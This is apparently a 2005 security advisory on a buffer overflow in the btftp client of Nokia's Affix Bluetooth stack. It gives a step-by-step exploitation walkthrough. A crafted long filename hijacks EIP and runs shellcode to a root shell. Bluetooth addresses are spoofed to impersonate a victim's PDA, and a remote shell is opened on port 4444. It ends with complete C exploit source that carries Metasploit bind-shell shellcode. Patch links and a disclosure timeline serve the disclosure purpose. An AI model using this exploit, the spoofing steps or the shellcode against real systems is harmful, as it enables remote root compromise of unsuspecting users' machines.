<<< Date Index >>>     <<< Thread Index >>>

DMA[2005-0712a] - 'Nokia Affix Bluetooth btftp client buffer overflow'



DMA[2005-0712a] - 'Nokia Affix Bluetooth btftp client buffer overflow'
Author: Kevin Finisterre
Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net
Product: 'affix'
References: 
http://www.digitalmunition.com/DMA[2005-0712a].txt

Description: 
Affix is a Bluetooth Protocol Stack for Linux that was developed by the Nokia 
Research Center in 
Helsinki and released under GPL. Affix supports the core Bluetooth protocols 
like HCI, L2CAP 1.1, 
L2CAP 1.2, RFCOMM, SDP and various Bluetooth profiles. Affix consists of 
'affix-kernel' which 
provides kernel modules and 'affix' which provides control tools, libraries, 
and server daemons.

Although Nokia believes that Affix is an useful piece of software, please bear 
in mind that it is 
not an official Nokia product, but a result of the research activity of Nokia 
Research Center.

The Affix Bluetooth client utility 'btftp' contains a buffer overflow in the 
proccessing of long 
filenames. By placing a 102 character filename into a public bluetooth share 
you are able to 
overwrite the eip (on an x86 version) of the btftp client. 

In this example the machine 'frieza' (00:11:95:4f:60:1f) is running btsrv with 
OBEX File Transfer. 

Place a test file in the public bluetooth share. 
root@frieza:/var/spool/affix/Inbox# touch `perl -e 'print "41" x 98' . "DCBA"`

Connect from a vulnerable client machine in order to demonstrate the overflow. 

Starting program: /usr/bin/btctl ftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:11:95:4f:60:1f
Connected.
ftp> ls
-----           0               AAAAAAAAAAAAA...AAAAAAAAAAAAAADCBA
d----           0               Faxes
d----           0               New Folder
d----           0               SC Info

Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()

(gdb) i r
eax            0x10     16
ecx            0x0      0
edx            0x4001a1e3       1073848803
ebx            0x41414141       1094795585
esp            0xbffffbc0       0xbffffbc0
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41424344       0x41424344

(gdb) x/4s $esp-100
0xbffffb5c:      " Info"
0xbffffb62:      "er"
0xbffffb65:      'A' <repeats 87 times>, "DCBA"
0xbffffbc1:      " \001@À\217\005\b"

As a quick test we will use anathema@xxxxxxxxxx's 0xff-less execve() /bin/sh 
shellcode and a bit of 
perl to see if we can execute code.

root@frieza:~# cd /var/spool/affix/Inbox/
root@frieza:/var/spool/affix/Inbox# touch `perl -e 'print "\x90" x 
(94-45)'``../ffless``perl -e 'print "\x5b\xfb\xff\xbf" x10 '`
root@frieza:/var/spool/affix/Inbox# ls
?????????????????????????????????????????????????????0?.bin@???.sh!@?F?)??F??v??F??????K??S???[???[???[???[???[???[???[???[???[???[???

As you can see we are able to run our payload on the client machine, however in 
this case the 
shellcode needs to be swapped out for something more useful.  

threat:~# btftp
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:11:95:4f:60:1f
Connected.
ftp> ls
-rwdx           1512            ffless.c
-rwdx           12605           ffless
-rwdx           0                                           °
                                                               Í
Program received signal SIGTRAP, Trace/breakpoint trap.
0x40000c20 in ?? () from /lib/ld-linux.so.2
(gdb) c
Continuing.
sh-2.05b# 

Keep in mind that in order to exploit this the attacker MUST be able to 
convince the target to browse 
an obex file share that is under control of the attacker. Using an Ericsson ROK 
101 008 bluetooth 
chip will increase our chances of success. Below shows an example impersonation 
scenario. 

First lets find someone to impersonate.

root@frieza:~# btctl discovery
Searching 8 sec ...
Searching done. Resolving names ...
done.
+1: Address: 00:0c:76:46:f0:21, Class: 0xB20104, Key: "no", Name: "threat"
   Computer (Desktop) [Networking,Object Transfer,Audio,Information]
+2: Address: 00:10:60:29:4f:f1, Class: 0x420210, Key: "no", Name: "Bluetooth 
Modem"
   Phone (Wired Modem/VoiceGW) [Networking,Telephony]
+3: Address: 00:04:3e:65:a1:c8, Class: 0x120110, Key: "no", Name: "Pocket_PC"
   Computer (Handheld PC/PDA) [Networking,Object Transfer]

Lets pretend to be some poor chaps PDA! We need to steal his BD_ADDR first. 

root@frieza:~# btctl
bt0     01:02:03:04:05:06
       Flags: UP DISC CONN
       RX: acl:159 sco:0 event:97 bytes:4810 errors:0 dropped:0
       TX: acl:168 sco:0 cmd:29 bytes:19267 errors:0 dropped:0
       Security: service pair [-auth, -encrypt]
       Packets: DM1 DH1 DM3 DH3 DM5 DH5 HV1 HV3
       Role: deny switch, remain slave

root@frieza:~# wget http://www.digitalmunition.com/setbd-affix.c
--11:50:18--  http://www.digitalmunition.com/setbd-affix.c
           => `setbd-affix.c'
Resolving www.digitalmunition.com... 195.74.102.163
Connecting to www.digitalmunition.com[195.74.102.163]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,951 [text/plain]

100%[================================================================================>]
 2,951         --.--K/s

11:50:19 (29.36 KB/s) - `setbd-affix.c' saved [2951/2951]

root@frieza:~# cc -o setbd-affix setbd-affix.c -laffix

root@frieza:~# ./setbd-affix 00:04:3e:65:a1:c8
Using BD_ADDR from command line
Setting BDA to 00:04:3e:65:a1:c8

root@frieza:~# btctl reset
root@frieza:~# btctl down
root@frieza:~# btctl up
btctl: cmd_initdev: Unable to start device (bt0)
root@frieza:~# btctl up
root@frieza:~# btctl
bt0     00:04:3e:65:a1:c8
       Flags: UP DISC CONN
       RX: acl:159 sco:0 event:126 bytes:5796 errors:0 dropped:0
       TX: acl:168 sco:0 cmd:52 bytes:19885 errors:0 dropped:0
       Security: service pair [-auth, -encrypt]
       Packets: DM1 DH1 DM3 DH3 DM5 DH5 HV1 HV3
       Role: deny switch, remain slave

root@frieza:~# btctl name "Pocket_PC"

God I love my ROK chip!

Start up btsrv and wait for a connection from your target. 

btsrv: main: btsrv started [Affix 2.1.2].
btsrv: start_service: Bound service Serial Port to port 1
btsrv: start_service: Bound service Dialup Networking to port 2
btsrv: start_service: Bound service Dialup Networking Emulation to port 3
btsrv: start_service: Bound service Fax Service to port 4
btsrv: start_service: Bound service LAN Access to port 5
btsrv: start_service: Bound service OBEX File Transfer to port 6
btsrv: start_service: Bound service OBEX Object Push to port 7
btsrv: start_service: Bound service Headset to port 8
btsrv: start_service: Bound service HeadsetAG to port 9
btsrv: start_service: Bound service HandsFree to port 10
btsrv: start_service: Bound service HandsFreeAG to port 11

You can tell that the target has connected by looking for the following in your 
btsrv logs. 

btsrv: handle_input: Connection from 00:0c:76:46:f0:21
channel 6 (OBEX File Transfer Profile)
btsrv: execute_cmd: Socket multiplexed to stdin/stdout
btsrv: signal_handler: Sig handler : 2

Upon connecting and performing a file list the target would see the following. 

threat:~# btftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp>  open 00:04:3e:65:a1:c8
Connected.
ftp> ls
Z8Á¾ýÞ)á½Tnb    6               uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V
           Ï­¹¿)ýÞ
ýÞÑýÞÐÉî¼Xq¶X6¶Y0

At this point your payload is running. 

After they have been exploited you could use a hijacked PAND connection to 
obtain your shell prompt.
Or perhaps write some bluetooth aware shellcode.

root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444
Trying 192.168.1.207...
Connected to 192.168.1.207.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
hostname;
threat
: command not found


Official patches for Affix can be found at http://affix.sourceforge.net
http://affix.sourceforge.net/affix_320_sec.patch
http://affix.sourceforge.net/affix_212_sec.patch

This is basic timeline associated with this bug. 

07/12/05 Public disclosure
07/11/05 notice that Security update.Patch for affix-3.2.0 was posted 07/01/05
07/06/05 Ask Carlos for update... 
07/05/05 str0ke dropped code on milw0rm - http://www.milw0rm.com/id.php?id=1081
06/17/05 Carlos.Chinea stated "you are using a old version of affix...Please 
update"
06/14/05 Carlos.Chinea contacted

-KF


/*

Remote Nokia Affix btftp client exploit
by kf_lists[at]secnetops[dot]com

threat:~# btftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp>  open 00:04:3e:65:a1:c8
Connected.
ftp> ls
Z8Á¾ýÞ)á½Tnb    6               uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V
            Ï­¹¿)ýÞ
ýÞÑýÞÐÉî¼Xq¶X6¶Y0

----------------------

root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444
Trying 192.168.1.207...
Connected to 192.168.1.207.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
hostname;
threat
: command not found



*/

#include <stdio.h>
#include <strings.h>
main()
{
        FILE *malfile;

        /* linux_ia32_bind - LPORT=4444 Size=108 Encoder=Pex 
http://metasploit.com */ 
        unsigned char scode[] = 
        "\x33\xc9\x83\xe9\xeb\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x99" 
        "\xee\x30\x5e\x83\xee\xfc\xe2\xf4\xa8\x35\x63\x1d\xca\x84\x32\x34" 
        "\xff\xb6\xa9\xd7\x78\x23\xb0\xc8\xda\xbc\x56\x36\x88\xb2\x56\x0d" 
        "\x10\x0f\x5a\x38\xc1\xbe\x61\x08\x10\x0f\xfd\xde\x29\x88\xe1\xbd" 
        "\x54\x6e\x62\x0c\xcf\xad\xb9\xbf\x29\x88\xfd\xde\x0a\x84\x32\x07" 
        "\x29\xd1\xfd\xde\xd0\x97\xc9\xee\x92\xbc\x58\x71\xb6\x9d\x58\x36" 
        "\xb6\x8c\x59\x30\x10\x0d\x62\x0d\x10\x0f\xfd\xde"; 

        char buf[1024];
        memset(buf,'\0',sizeof(buf));
        memset(buf,'\x90',94);
        strcat(buf+94,"\x75\xfb\xff\xbf");
        strcat(buf+98,"\x75\xfb\xff\xbf");
        memset(buf+102,'\x90',40);
        strcat(buf+142,scode);

        if(!(malfile = fopen(buf,"w+"))) {
                printf("error opening file\n");
                exit(1);
        }
        
        fprintf(malfile, "pwned\n" );
        fclose(malfile);

}